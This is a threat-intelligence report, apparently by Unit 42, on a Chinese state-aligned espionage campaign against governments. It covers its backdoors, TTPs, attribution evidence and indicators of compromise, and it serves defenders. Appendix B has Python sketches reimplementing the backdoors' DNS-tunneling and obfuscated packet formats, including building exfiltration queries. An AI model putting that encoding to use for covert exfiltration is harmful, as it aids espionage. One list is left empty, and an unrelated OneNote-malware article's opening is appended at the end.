An analysis of this threat actor’s activity reveals long-term espionage operations against at least seven governmental entities. The threat actor performed intelligence collection efforts at a large scale, leveraging rare email exfiltration techniques against compromised servers.

This collection effort includes attempts to obtain sensitive and classified information about the following entities, focusing on current geopolitical affairs:

  • Diplomatic and economic missions
  • Embassies
  • Military operations
  • Political meetings
  • Ministries of the targeted countries
  • High-ranking officials

As part of its espionage activities, the group makes use of a previously undocumented family of backdoors, including those that we have named TunnelSpecter and SweetSpecter.

The threat actor appears to closely monitor contemporary geopolitical developments, attempting to exfiltrate information daily. The threat actor’s modus operandi in cases we observed was to infiltrate targets’ mail servers and to search them for information. We observed multiple efforts to maintain persistence, including repeated attempts to adapt and regain access when the actor’s activities were disrupted. They also appear to return to the well to search for relevant information when new geopolitical events occur.

We assess with high confidence that a single threat actor orchestrates Operation Diplomatic Specter, operating on behalf of Chinese state-aligned interests. The tactics observed as part of this campaign show the extent to which Chinese state-aligned threat actors attempt to gather information about affairs beyond the Asian region, even extending into the Middle East and Africa.

It is unclear exactly how threat actors are using the intelligence collected as part of this campaign. However, the topics the threat actors searched for reveal information about many key players in these regions and their connections to China and other parts of the world. The topics they searched for provide researchers a window into the possible priorities of Chinese state-aligned threat actors.

In addition, the threat actor’s repeated use of Exchange server exploits (ProxyLogon CVE-2021-26855 and ProxyShell CVE-2021-34473) for initial access further emphasizes the importance for organizations to harden and patch sensitive internet-facing assets. This is especially true for known and prominent vulnerabilities, to reduce the attack surface and maximize protection efforts.

Organizations that safeguard sensitive information should pay particular attention to commonly exploited vulnerabilities. They should also adhere to best practices when it comes to IT hygiene, as APTs often seek to gain access through methods they know have been effective in the past.

Lastly, we are sharing our analysis to provide defenders with means to detect and protect themselves against such advanced attacks.

Palo Alto Networks customers are better protected against Operation Diplomatic Specter through the following:

  • Network Security: Delivered through a Next-Generation Firewall (NGFW) configured with machine learning enabled and cloud-delivered security services. This includes Advanced Threat Prevention, Advanced URL Filtering, Advanced DNS Security and WildFire, a malware protection engine capable of identifying and blocking malicious samples and infrastructure.
  • Security Automation: Delivered through a Cortex XSOAR or XSIAM solution capable of providing SOC analysts with a comprehensive understanding of the threat derived by stitching together data obtained from endpoints, network, cloud and identity systems.
  • Anti-Exploit protection: Delivered through Cortex XSIAM and provides protection against exploitation of different vulnerabilities including ProxyShell and ProxyLogon.
  • Cloud Security: Prisma Cloud Compute and WildFire integration can help detect and prevent malicious execution of the Specter backdoor within Windows-based VM, container and serverless cloud infrastructure.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics China, Backdoor

Operation Diplomatic Specter Motivation and Victimology

The threat actor behind Operation Diplomatic Specter searches for information on politicians, military operations and personnel, as well as governmental ministries, with a particular focus on foreign affairs ministries and embassies. Figure 1 shows the regions where the threat actor targets organizations in the Middle East, Africa and Asia.

Image 1 is a map where circles identify the regions targeted in Operation Diplomatic Specter. These regions include Africa, the Middle East, and southeast Asia.
Figure 1. Regions targeted in Operation Diplomatic Specter.

Moreover, the threat actor appears to closely monitor contemporary geopolitical developments, demonstrating an intent to acquire information associated with ongoing events. The campaign has been operating since at least late 2022, with automatic exfiltration attempts occurring daily, in addition to periodic efforts involving more hands-on-keyboard attention from the threat actor.

These events encompass a wide range of subjects, including the following:

  • Military operations
  • Meetings
  • Summits
  • Conflicts
  • Other pertinent aspects of current geopolitical affairs

In some cases, the threat actor searched for particular keywords and exfiltrated anything they could find related to them, such as entire archived inboxes belonging to particular diplomatic missions or individuals. The threat actor also exfiltrated files related to topics they were searching for.

In other cases, the exfiltration appeared more targeted, focusing on the results of more specific searches. The searches we observed related to the following topics:

  • China-related geopolitical and economic information (meetings, summits, relationship with other countries, information related to President Xi)
  • OPEC and energy industry
  • Ministry of Foreign Affairs and embassies worldwide
  • Ministry of Defense
  • Military (operations, drills, code words, military units and personnel)
  • The relationship of the targeted countries with the Biden administration
  • Local and international political figures
  • Geopolitical and economic information
  • Telecommunications technology used by the targeted entities

Figure 2 shows an example of the automated mailbox harvesting of one of the affected countries’ embassies and diplomatic missions.

Image 2 is a screenshot of code of email inbox targets of certain embassies. These are bolded in orange or black and include Washington, DC, Paris, London and Moscow.
Figure 2. Example of embassies’ email boxes targeted by the threat actor.

Figures 3 and 4 show examples of the threat actor targeting mailboxes of the ministry of foreign affairs and ministry of defense, as well as military organizations including the navy, air force and specific task forces of the targeted country.

Image 3 is a screenshot of code of email inbox targets of certain embassies. These are bolded in orange or black and include the Ministry of Foreign Affairs, the Navy and the Ministry of Defense.
Figure 3. Example of embassies’ email boxes targeted by the threat actor.

Image 4 is a screenshot of an alert in Cortex XDR with some of the information redacted. The process accesses Outlook files. The user who ran the process is NT AUTHORITY\SYSTEM. The accessed files are mostly redacted.
Figure 4. Example of embassies’ email boxes targeted by the threat actor.

Investigating the Actor Behind Operation Diplomatic Specter

Operation Diplomatic Specter is the name we’ve given to the espionage campaign described above. The details we’re sharing about this campaign are part of our ongoing investigation into an apparent Chinese state-aligned APT group.

Since late 2022, we have been tracking an activity cluster targeting governmental entities in the Middle East, Africa and Asia. In earlier stages of our tracking, we referred to the cluster as “CL-STA-0043,” indicating a cluster of activity that we suspect is associated with state-backed motivation (as described in “It’s All in the Name: How Unit 42 Defines and Tracks Threat Adversaries”).

We published on CL-STA-0043 in June 2023 in “Through the Cortex XDR Lens: Uncovering a New Activity Group Targeting Governments in the Middle East and Africa.”

In December 2023, Unit 42 published additional information related to CL-STA-0043 in “New Tool Set Found Used Against Organizations in the Middle East, Africa and the US.”

The tactics, techniques and procedures (TTPs) associated with the threat actor behind this cluster are relatively rare. Some of these TTPs had not been reported as being used in the wild before, and others had been reported only a handful of times. For in-depth details of the TTPs observed in association with Operation Diplomatic Specter, please see Appendix A.

The threat actor demonstrated adaptability in attempting to thwart various mitigation efforts. They also sought to maintain a persistent presence in compromised environments through the use of two novel and previously undocumented malware strains – SweetSpecter and TunnelSpecter.

We will cover the key details of these backdoors in the following section, Meet the Specter Family. For a deeper dive, please see Appendix B.

After meticulously monitoring the threat actor's activities, evolution and changes over a year, we graduated the activity cluster CL-STA-0043 to a temporary actor group (TGR-STA-0043) according to Unit 42’s cluster maturation process. Essentially, the graduation indicates our confidence that a single actor is behind the activity observed, and that we’ve established “several correlation points over time and across activity clusters.”

In relation to this process, we note that the threat actor appears to be aligned with Chinese state interests and bears the hallmarks of Chinese APTs. For more details of this attribution, please read the section on Connection to the Chinese Nexus. For more in-depth details, please see Appendix C.

Meet the Specter Family – Cousins of Gh0st RAT

One of the TTPs that most characterizes TGR-STA-0043 (and Operation Diplomatic Specter) is the use of custom-built backdoors that were not publicly observed before. During our investigation, we uncovered a pair of unique and stealthy backdoors that we call the Specter family, including TunnelSpecter and SweetSpecter.

We named the pair the Specter family to acknowledge a similarity to Gh0st RAT (described below). TunnelSpecter’s name refers to its DNS tunneling functionality and SweetSpecter’s name references similarities to the SugarGh0st RAT specifically.

The attackers used these backdoors to maintain stealthy access to their targets’ networks. The backdoors also provided them with the ability to execute arbitrary commands, exfiltrate data, and deploy further malware and tools on the infected hosts.

According to our analysis, we believe with a high level of confidence that these two distinct backdoors borrowed small portions of code from the Gh0st RAT source code that was leaked in 2008. However, these new backdoors appear to differ from other known Gh0st RAT variants.

TunnelSpecter Key Features

  • Custom tailored for a specific target, it created a rogue user that we found on that specific target
  • It implemented data encryption and exfiltration over DNS tunneling for increased stealth
  • It executed arbitrary commands and stored configuration data in a rarely seen registry key

SweetSpecter Key Features

  • It communicated with the C2 using encrypted zlib packets transmitted over a raw TCP stream, in typical Gh0st RAT fashion
  • Its compilation time correlated with a unique campaign ID format, which uses a month and year as the campaign identifier
  • It used unique registry keys to store other configuration data

It is noteworthy that we found a sample of Gh0st RAT in the same location as the Specter backdoors, further strengthening the connection. On top of that, all of these backdoors communicated with the same embedded infrastructure – subdomains of microsoft-ns1[.]com, as shown in Figure 5.

Image 5 is a diagram of the sample and malware family used in the campaign. Gh0st RAT, TunnelSpecter and SweetSpecter all point to the same domain.
Figure 5. The Gh0st RAT sample and Specter malware family used in Operation Diplomatic Specter.

For an in-depth analysis of TunnelSpecter and SweetSpecter, please refer to Appendix B.

A Gh0st RAT Variant Blasts From the Past

One of the types of malware used during the attacks associated with Operation Diplomatic Specter is the infamous Gh0st RAT malware family. We observed that threat actors attempted to use it to maintain a foothold in the compromised environments.

The first Gh0st RAT binary that we encountered during the attacks was a large file (approximately 280 MB) named Tpwinprn.dll. The web shell dropped this file under the SysWOW64 folder, and it was executed using a renamed rundll32.exe process.

When investigating this binary, we found that it has a notable string in memory: Game Over Good Luck By Wind. Figure 6 shows that this string was also observed in the Gh0st RAT variant used in Operation Iron Tiger [PDF] back in 2015. Iron Taurus, aka APT27, carried out this operation.

Image 6 is a screenshot of a report. To the left is text in the report. To the right is a string highlighted in orange among other lines of code.
Figure 6. Game Over Good Luck By Wind mentioned in Operation Iron Tiger. Source: “Operation Iron Tiger: Exploring Chinese Cyber-Espionage Attacks on United States Defense Contractors” [PDF] (p. 29).

Connection to the Chinese Nexus

Our investigation revealed strong connections and overlaps that tie the group behind Operation Diplomatic Specter to the Chinese nexus of espionage-focused threat actors. These connections and overlaps, covered in greater detail in Appendix C, consist of the following facets:

  • Infrastructure: The activity in Operation Diplomatic Specter originated from a shared Chinese APT operational infrastructure, exclusively used by Chinese nation-state threat actors, such as Iron Taurus (aka APT27), Starchy Taurus (aka Winnti) and Stately Taurus (aka Mustang Panda).
  • Activity time frame: Statistical analysis of the threat actors’ hands-on-keyboard interactive activity shows that it corresponds to 09:00-17:00 working hours in UTC+8. This time zone covers several Asian countries, including China. Historically, many Chinese nation-state threat actors have been observed operating in this time frame.
  • Linguistic artifacts: Several tools and files dropped by the threat actors included numerous comments and debug strings in Mandarin, suggesting that the scripts’ creators may be Mandarin-speaking individuals.
  • Tools and malware commonly used by Chinese APTs: Aside from the unique tools and malware, the threat actor also extensively used tools that are popular among Chinese threat actors, such as:
    • Customized Gh0st RAT samples
    • PlugX
    • Htran
    • China Chopper

While any threat actor can use these tools, they are mostly observed being used (especially together) in attacks involving Chinese threat actors.

  • Use of Chinese VPS: The attackers used Chinese VPS providers, such as Cloudie Limited and Zenlayer, for several of their C2 servers.

Conclusion

The exfiltration techniques observed as part of Operation Diplomatic Specter provide a distinct window into the possible strategic objectives of the threat actor behind the attacks. The threat actor searched for highly sensitive information, encompassing details about military operations, diplomatic missions, embassies and foreign affairs ministries.

Our research, which closely monitored this activity for over a year, revealed that the threat actor (which we track as TGR-STA-0043) has a potential motivation and modus operandi aligned with Chinese APT groups.

Besides using a rare set of tools, TGR-STA-0043 stands out for its persistence and adaptability. The threat actor unabashedly resumes operations even after exposure, which shows how brazen it is.

Notably, TGR-STA-0043 continues to leverage known vulnerabilities in internet-facing servers. This underscores the need for heightened vigilance and fortified cybersecurity measures across global governments and organizations.

A resilient defense mechanism is not only essential for thwarting evolving cyberthreats but also for preserving the confidentiality, integrity and availability of critical information. In cultivating a strong security posture, nations can better safeguard their interests, protect against potential vulnerabilities and ensure the overall resilience of their cybersecurity frameworks.

Protections and Mitigations

For Palo Alto Networks customers, our products and services provide the following coverage associated with this group:

  • WildFire cloud-delivered malware analysis service accurately identifies the known samples as malicious.
  • Advanced URL Filtering and Advanced DNS Security identify domains associated with this group as malicious.
  • Cortex XDR and XSIAM are designed to:
    • Prevent the execution of known malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module.
    • Protect against credential gathering tools and techniques using the new Credential Gathering Protection available from Cortex XDR 3.4.
    • Protect from threat actors dropping and executing commands from web shells using Anti-Webshell Protection, newly released in Cortex XDR 3.4.
    • Protect against exploitation of different vulnerabilities including ProxyShell and ProxyLogon using the Anti-Exploitation modules as well as Behavioral Threat Protection.
    • Detect post-exploit activity, including credential-based attacks, with behavioral analytics, through Cortex XDR Pro.
  • Prisma Cloud Compute and WildFire integration can help detect and prevent malicious execution of the Specter backdoor within Windows-based VM, container and serverless cloud infrastructure.

If you think you might have been impacted or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

Malware

TunnelSpecter

Loader:

  • 0e0b5c5c5d569e2ac8b70ace920c9f483f8d25aae7769583a721b202bcc0778f

Encrypted payload:

  • 62dec3fd2cdbc1374ec102d027f09423aa2affe1fb40ca05bf742f249ad7eb51

Decrypted payload:

  • 22d556db39bde212e6dbaa154e9bcf57527e7f51fa2f8f7a60f6d7109b94048e

Mutex:

  • “blogs.bing.com”

SweetSpecter

Loader:

  • 0b980e7a5dd5df0d6f07aabd6e7e9fc2e3c9e156ef8c0a62a0e20cd23c333373

Encrypted payload:

  • 8198c8b5eaf43b726594df62127bcb1a4e0e46cf5cb9fa170b8d4ac2a4dad179

Decrypted payload:

  • 0f72e9eb5201b984d8926887694111ed09f28c87261df7aab663f5dc493e215f

Gh0st RAT

  • d5a44380e4f7c1096b1dddb6366713aa8ecb76ef36f19079087fc76567588977

Infrastructure

Domains

  • home.microsoft-ns1[.]com
  • cloud.microsoft-ns1[.]com
  • static.microsoft-ns1[.]com
  • api.microsoft-ns1[.]com
  • update.microsoft-ns1[.]com
  • labour.govu[.]ml
  • govm[.]tk

IPs

  • 103.108.192[.]238
  • 103.149.90[.]235
  • 192.225.226[.]217
  • 194.14.217[.]34
  • 103.108.67[.]153

Additional Resources

Appendix A: Main TTPs Observed in Operation Diplomatic Specter

Image 7 is a chart of the TTPs used in the campaign, categorized by Intrusion, Reconnaissance, Privilege Escalation, Credential Theft, Lateral Movement and Data Theft.
Figure 7. TGR-STA-0043’s characteristics broken down by the attack lifecycle observed as part of Operation Diplomatic Specter.

As part of our observations of Operation Diplomatic Specter, we saw a distinctive set of TTPs. These TTPs indicate a high level of coordination, technical skill and determination – characteristics often associated with a nation-state threat actor. We previously wrote a deep technical analysis of the flow of the attack and the main TTPs.

Overview of TGR-STA-0043’s Tools and Malware

Tools               Malware
Htran               TunnelSpecter
Yasso               SweetSpecter
JuicyPotatoNG       Agent Racoon
Nbtscan             Ntospy
Scansql             PlugX
Ladon               Gh0st RAT
Samba SMB client    China Chopper
Impacket
SharpEfsPotato
Iislpe
Mimikatz

Table 1. TGR-STA-0043’s tools and malware.

A review of the main TTPs follows:

Targeted Data Exfiltration From Exchange Servers

TGR-STA-0043 took a meticulous approach to targeted data exfiltration. The threat actor abused the Exchange Management Shell to steal hundreds of emails, and added PowerShell snap-ins (PSSnapins) to steal emails through a script. In both cases, the threat actor searched for sensitive emails using specific keywords. Those keywords served as critical indicators, giving us as researchers a precise understanding of the information targeted by TGR-STA-0043.

Credential Theft Using Network Providers

TGR-STA-0043 showcased a variety of credential theft methodologies. While deploying well-known techniques such as using Mimikatz and dumping the SAM key, the threat actor also introduced an uncommon credential theft tactic.

This novel approach involved the execution of a PowerShell script to register a new network provider, a method recognized as a proof of concept (PoC) named NPPSpy, and alternatively known as Ntospy by Unit 42. This technique is rare and has been reported only a handful of times in the past.

In-Memory VBS Implant

To infiltrate the network, TGR-STA-0043 strategically focused on exploiting vulnerabilities within Microsoft Exchange servers and public-facing web servers. The threat actor successfully gained access to specific targeted environments through the deployment of in-memory VBScript implants. This tactic not only underscored TGR-STA-0043's technical proficiency but also highlighted their ability to execute web shells in a clandestine manner on-the-fly, while attempting to bypass security mitigations.

Debut of the Yasso Penetration Tool Set

The emergence of a relatively new penetration testing tool set, Yasso, marked a shift in the tactics employed by TGR-STA-0043. This tool set encompassed a range of functionalities, including the following:

  • Scanning
  • Brute forcing
  • Remote interactive shell capabilities
  • Arbitrary command execution

What set Yasso apart was its unique feature set, incorporating powerful SQL penetration functions and database capabilities. As of this writing, this tool set had not been publicly reported as being used in the wild by another threat actor.

Appendix B: Additional Technical Details on the Backdoors

TunnelSpecter

TunnelSpecter is a previously undocumented custom backdoor that the malware authors specifically customized for the target. Figure 8 shows that the authors hard-coded this backdoor with a unique username, SUPPORT_388945c0. Notably, this username is a deliberate attempt to mimic the default account SUPPORT_388945a0, commonly associated with the Windows Remote Assistance feature.

An indication of the tailored nature of this malware is the preemptive creation of the same account (SUPPORT_388945c0). The threat actor created this account using a web shell within the compromised environment several weeks prior to the deployment of TunnelSpecter. The threat actor used TunnelSpecter to create the user, in the event that they failed to create it using the web shell. They then added the user (newly or previously created) to the Administrators group.

Image 8 is a screenshot of many lines of code. Highlighted in a red box is the embedded username and password.
Figure 8. Embedded username and password in TunnelSpecter.

The main functionality of TunnelSpecter includes:

  • Fingerprinting the infected machine and creating a unique identifier for each infected host, based on the CRC32 hash of the machine's cpuid value.
  • Executing arbitrary commands by implementing a remote command-line interface. The supported commands can gather different information about the infected machine, such as the operating system version or host details.
  • DNS tunneling C2 communication while encrypting communication using a hard-coded Caesar cipher on top of hex encoding. When transmitting data, TunnelSpecter prepends the unique machine identifier followed by a predetermined flag (b, c, d or z) and then the stolen data content. Figure 9 below shows this communication.
Image 9 is a screenshot of many lines of code as TunnelSpecter implements a DNS tunneling communication.
Figure 9. DNS tunneling communication implemented in TunnelSpecter.
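
The fingerprinting and encoding steps described above can be illustrated with a minimal sketch. This is not TunnelSpecter's code: the shift value, the choice to rotate characters within the hex alphabet, the label layout and the example.com domain are all assumptions made for illustration, since the article only states that a hard-coded Caesar cipher is applied on top of hex encoding and that the machine identifier and a flag precede the data.

```python
import zlib

HEX_ALPHABET = "0123456789abcdef"
SHIFT = 3  # hypothetical value; the real shift is hard-coded in the sample
VALID_FLAGS = {"b", "c", "d", "z"}  # flags named in the article


def machine_id(cpuid_value: bytes) -> str:
    """Render the CRC32 of the cpuid value as 8 hex characters."""
    return f"{zlib.crc32(cpuid_value) & 0xFFFFFFFF:08x}"


def caesar_hex(text: str, shift: int) -> str:
    """Rotate each hex digit within the 16-character hex alphabet (assumed scheme)."""
    return "".join(
        HEX_ALPHABET[(HEX_ALPHABET.index(ch) + shift) % 16] for ch in text
    )


def encode_payload(data: bytes) -> str:
    """Hex-encode the data, then apply the Caesar shift."""
    return caesar_hex(data.hex(), SHIFT)


def decode_payload(encoded: str) -> bytes:
    """Reverse the Caesar shift, then hex-decode."""
    return bytes.fromhex(caesar_hex(encoded, -SHIFT))


def build_query(cpuid_value: bytes, flag: str, data: bytes, domain: str) -> str:
    """Assemble <machine id><flag><encoded data>.<domain> (assumed layout)."""
    if flag not in VALID_FLAGS:
        raise ValueError(f"unexpected flag: {flag!r}")
    return f"{machine_id(cpuid_value)}{flag}{encode_payload(data)}.{domain}"


if __name__ == "__main__":
    query = build_query(b"GenuineIntel", "b", b"hostname", "example.com")
    print(query)
    print(decode_payload(encode_payload(b"hostname")))
```

For defenders, the useful property is the shape of the resulting query: a fixed-length identifier, a single flag character and a long run of hex-like characters in the leftmost label, which is the kind of pattern DNS tunneling detections tend to look for.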

As shown in Figure 10, Cortex XDR prevented TunnelSpecter, recognizing it as a suspicious DLL.

Image 10 is a screenshot of a Cortex XDR Prevention Alert.
Figure 10. Prevention alert for TunnelSpecter, raised by Cortex XDR.

Although we could not see a clear similarity between TunnelSpecter and Gh0st RAT, the malware shared similarity with the second backdoor discovered, SweetSpecter (described below).

SweetSpecter

Based on our analysis of the SweetSpecter malware, we believe it was written by the same author as TunnelSpecter. We found that it shares code similarities with TunnelSpecter and SugarGh0st RAT. This RAT is a relatively new variant of Gh0st RAT that emerged in November 2023 and that researchers at Talos observed targeting governments in Asia.

SweetSpecter implements Gh0st RAT’s known TCP communication scheme by sending a zlib compressed TCP packet to the command and control server. SweetSpecter also performs add and xor operations with the value 0x5f to add an encryption layer and thwart network-based signatures.

The “Gh0st” header is absent in this variant, and it is randomized instead based on the seed value received from GetTickCount. Figure 11 below shows an example of the transmitted data:

  1. The aforementioned random value.
  2. The random value from (1) XORed with 0x2341, another value hard-coded in SweetSpecter.
  3. The length of the compressed buffer including the preliminary 12 header bytes.
  4. The length of the decompressed buffer.
  5. The zlib magic bytes 0x789c, after the add and XOR operations with 0x5f have been applied to them.
Image 11 is a screenshot of the compressed and encrypted TCP packet. Highlighted by numbers 1 through 5 are important transmitted data.
Figure 11. The content of the zlib compressed and encrypted TCP packet.
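
To make the packet layout above concrete, the following sketch builds and parses a packet with the five fields listed. Several details are assumptions rather than facts from the analysis: the field widths (2 + 2 + 4 + 4 bytes, chosen only because they add up to the 12 header bytes mentioned), little-endian byte order, and the order of the two operations (add 0x5f, then XOR with 0x5f). The function names are hypothetical.

```python
import struct
import zlib

KEY = 0x5F           # value used for the add and XOR operations
HEADER_XOR = 0x2341  # hard-coded value XORed with the random header value
# Assumed layout: random value, random ^ 0x2341, total length, plain length.
HEADER = struct.Struct("<HHII")  # 2 + 2 + 4 + 4 = 12 bytes


def obfuscate(buf: bytes) -> bytes:
    """Add 0x5f to each byte (mod 256), then XOR with 0x5f (assumed order)."""
    return bytes(((b + KEY) & 0xFF) ^ KEY for b in buf)


def deobfuscate(buf: bytes) -> bytes:
    """Invert obfuscate(): XOR with 0x5f, then subtract 0x5f (mod 256)."""
    return bytes(((b ^ KEY) - KEY) & 0xFF for b in buf)


def build_packet(plaintext: bytes, seed: int) -> bytes:
    """Build a packet in the assumed layout, for testing the parser."""
    rand = seed & 0xFFFF
    body = obfuscate(zlib.compress(plaintext))
    header = HEADER.pack(
        rand, rand ^ HEADER_XOR, HEADER.size + len(body), len(plaintext)
    )
    return header + body


def parse_packet(packet: bytes) -> bytes:
    """Validate the header fields and return the decompressed content."""
    rand, check, total_len, plain_len = HEADER.unpack_from(packet)
    if check != rand ^ HEADER_XOR:
        raise ValueError("header check value does not match")
    if total_len != len(packet):
        raise ValueError("length field does not match packet size")
    plaintext = zlib.decompress(deobfuscate(packet[HEADER.size:total_len]))
    if len(plaintext) != plain_len:
        raise ValueError("decompressed length mismatch")
    return plaintext


if __name__ == "__main__":
    pkt = build_packet(b"system profile data", seed=0x1234)
    print(pkt[:HEADER.size].hex(), parse_packet(pkt))
```

The relationship between the first two header fields is the part most likely to be useful for a network signature, because the random value changes per packet while the XOR relationship between the two fields stays constant.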

Similarities with SugarGh0st RAT include:

  • Using the HKLM\SOFTWARE\WOW6432Node\ODBC registry key
  • Using the GPINFO registry key and default value as a second campaign identifier
  • Campaign ID format, using a string representing a month and a year (i.e., 2023.03) as shown in Figure 12
Image 12 is a screenshot of the campaign’s ID string.
Figure 12. Campaign ID string similarity between SweetSpecter and SugarGh0st RAT.

Finally, similarities with TunnelSpecter include:

  • Using the HKLM\SOFTWARE\WOW6432Node\ODBC registry key
  • Generating the same user identifier by using the cpuid instruction
  • Generating a mutex containing a domain name
  • Similar initial system profiling and data sent to the C2

As shown in Figure 13, Cortex XDR prevented SweetSpecter, recognizing it as a suspicious DLL.

Image 13 is a screenshot of a Cortex XDR Prevention Alert.
Figure 13. Prevention alert for SweetSpecter, raised by Cortex XDR.

Appendix C: Additional Details on the Attribution to the Chinese Nexus

Infrastructure

Over the span of a year, we have been tracking and monitoring the infrastructure related to TGR-STA-0043, including changes in the C2 servers used by the threat actor.

In addition, we were able to uncover additional servers that are part of this complex operational infrastructure by pivoting on strategic data points, based on the already established knowledge of the infrastructure.

Our investigation revealed indications that threat actors employed a substantial portion of the correlated infrastructure, either presently or historically, as C2 servers for two prominent pieces of malware: PlugX and Trochilus RAT. These two pieces of malware (especially PlugX) are largely associated with Chinese threat actors. However, other threat actors can access and use them as well.

As depicted in Figure 14 below, we found multiple IP addresses related to the infrastructure, as well as domains and subdomains. A particularly noteworthy facet of our observations pertains to the threat actor's deliberate endeavors to assume the guise of both legitimate Microsoft servers (e.g., *.microsoft-ns1[.]com) and governmental entities. For example, *.govu[.]ml masquerades as a Mali-government address. (The threat actor’s impersonation does not imply any issues with the legitimate servers or governmental entities.)

Image 14 is a Maltego graph tracking the infrastructure. A mix of icons denote the IP addresses, domains and subdomains, and other parts of their network.
Figure 14. Maltego graph of the pivoting on the infrastructure used in Operation Diplomatic Specter.

Overlaps

As shown in the Maltego graph above, there are multiple overlaps between the infrastructure leveraged in Operation Diplomatic Specter and different operations, all associated with Chinese APTs.

IP Address Overlaps

The first overlap observed involves the IP address 192.225.226[.]217, used as one of the main C2 servers for the threat actor to communicate with at least one target. This IP was also observed in three different operations:

SSL/TLS Certificate Overlaps/Pivoting

The other overlaps observed are related to the use of the same SSL certificate (SHA256: 3d74df40e3d2730941ff64f275217ae6d46b20d7fbbd04123bc156daf8f6e85c). This certificate was observed in multiple servers, some of which were overlapping with different activities, all associated with Chinese APTs.

The certificate pivoting led to the following IP address overlaps:

  • The IP address 27.255.79[.]17 resolves to the domain poer.whoamis[.]info. It was mentioned in the context of Operation Earth Berberoka [PDF], which was attributed to Iron Taurus. It was also mentioned in connection to Starchy Taurus (aka Winnti).
  • The IP address 108.61.178[.]125, which resolves to airjaldinet[.]ml, was mentioned in two operations: Storm Cloud and Holy Water. These two operations were linked to Chinese APTs with different confidence levels, but they were not attributed to any specific group. In addition, the IP address 192.225.226[.]196 resolves to safer.ddns[.]us. It also appeared in the analysis of Operation Exorcist [PDF] mentioned above.

Activity Time Frame

During our analysis of compromised assets, we successfully traced the time frame of the threat actor's interactive sessions, focusing on hands-on-keyboard commands received from web shells and backdoors. Extensive mapping of the activity's working hours over several months revealed a notable and consistent pattern.

As Figure 15 below shows, our findings indicate a strong alignment with a standard 9-to-5 workday within the UTC+8 time zone. This time frame notably corresponds to the working hours of several Asian countries, including but not limited to China.

Image 15 is a diagram of the hourly activity mapped between standard Universal Time in red and the UTC+8 time in green, comparing a standard workday of 9:00 AM to 5:00 PM. The hours correspond.
Figure 15. TGR-STA-0043 hourly breakdown of activity.
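
The kind of hourly breakdown described here can be reproduced with a short script. The sketch below is illustrative only: the function names and the sample timestamps are hypothetical, and it assumes the command timestamps are available as timezone-aware datetime values.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone

UTC8 = timezone(timedelta(hours=8))


def hourly_histogram(timestamps, tz=UTC8):
    """Count events per local hour after converting each timestamp to tz."""
    return Counter(ts.astimezone(tz).hour for ts in timestamps)


def working_hours_share(timestamps, tz=UTC8, start=9, end=17):
    """Return the fraction of events that fall in [start, end) local time."""
    hist = hourly_histogram(timestamps, tz)
    total = sum(hist.values())
    if total == 0:
        return 0.0
    inside = sum(count for hour, count in hist.items() if start <= hour < end)
    return inside / total


if __name__ == "__main__":
    # Hypothetical hands-on-keyboard command times, recorded in UTC.
    events = [
        datetime(2023, 3, 1, 1, 30, tzinfo=timezone.utc),  # 09:30 in UTC+8
        datetime(2023, 3, 1, 8, 0, tzinfo=timezone.utc),   # 16:00 in UTC+8
        datetime(2023, 3, 1, 12, 0, tzinfo=timezone.utc),  # 20:00 in UTC+8
    ]
    print(working_hours_share(events, UTC8))
    print(working_hours_share(events, timezone.utc))
```

Comparing the share across candidate time zones shows which offset best fits a standard workday. As the article notes, a match narrows the candidates to a set of countries rather than identifying a single one.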

Linguistic Artifacts

During our investigation, we acquired several scripts and files that prominently feature numerous comments and debug strings in Mandarin, suggesting that the scripts’ creators are Mandarin-speaking individuals. One of those files is a web shell found on one compromised environment.

Further inspection of the code revealed a subtle resemblance between the code in the web shell we obtained and a GitHub repository of a penetration testing PoC tool. This tool is named GetShell, and was created three years ago.

It is possible that the web shell used by the threat actor borrowed code from this existing repository. However, the threat actor appears to tailor the code to suit specific targets, modifying it based on the nature of the targeted data.

In particular, we identified a customized version of this web shell deployed on the Exchange servers of one of the targets. This modified version, named ManagementMailboxPicker.aspx, demonstrated functionalities focused on file uploads and not limited to images, as shown in Figure 16.

Our analysis suggests that the threat actor leveraged this web shell to manage the upload of files, potentially .pst and archive files containing email data. The nomenclature ManagementMailboxPicker.aspx further implies its role in the manipulation of mailbox-related activities.

Image 16 is a screenshot of many lines of code. Three lines are indicated by arrows that contain Chinese characters. From top to bottom: Save file address. File allowed formats. File size limit in KB.
Figure 16. Mandarin strings observed in the sample.

Tools and Malware Commonly Used by Chinese APTs

Another facet that strengthens the connection to a Chinese threat actor lies in the tools and malware employed during the operation. We observed multiple tools and malware commonly associated with a diverse range of Chinese threat actors, including:

  • Gh0st RAT
  • PlugX
  • China Chopper
  • Htran

While many Chinese threat actors seem to favor these tools, it's crucial to emphasize that the mere presence of these tools and malware does not singularly establish a link or attribution to Chinese threat actors. While these tools are prevalent among such actors, they are not exclusive to this context and are accessible for use by other threat actors as well.

Use of Chinese VPS

The attackers used Chinese VPS providers, such as Cloudie Limited and Zenlayer, for several of their C2 servers. It is interesting to note that some of those VPS services are offered in Yuan only. The fact that the service is offered only in Yuan can strengthen the connection to Chinese operators, but of course it’s not limited to them.

Payload Trends in Malicious OneNote Samples

Executive Summary

In this post, we look at the types of embedded payloads that attackers leverage to abuse Microsoft OneNote files. Our analysis of roughly 6,000 malicious OneNote samples from WildFire reveals that these samples have a phishing-like theme where attackers use one or more images to lure people into clicking or interacting with OneNote files. The interaction then executes an embedded malicious payload.

Since macros have been disabled by default in Office, attackers have turned to leveraging other Microsoft products for embedding malicious payloads. As a result, malicious OneNote files have grown in popularity. The OneNote desktop app is included by default with Office 2019 and Microsoft 365 on Windows, so it can load a malicious OneNote file if someone accidentally opens one.

We find that attackers have the freedom to embed either text-based malicious scripts or binary files inside OneNote. This offers them more flexibility compared to traditional macros in documents.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Next-Generation Firewall with cloud-delivered security services including WildFire.
  • Prisma Access devices with cloud-delivered security services including WildFire.
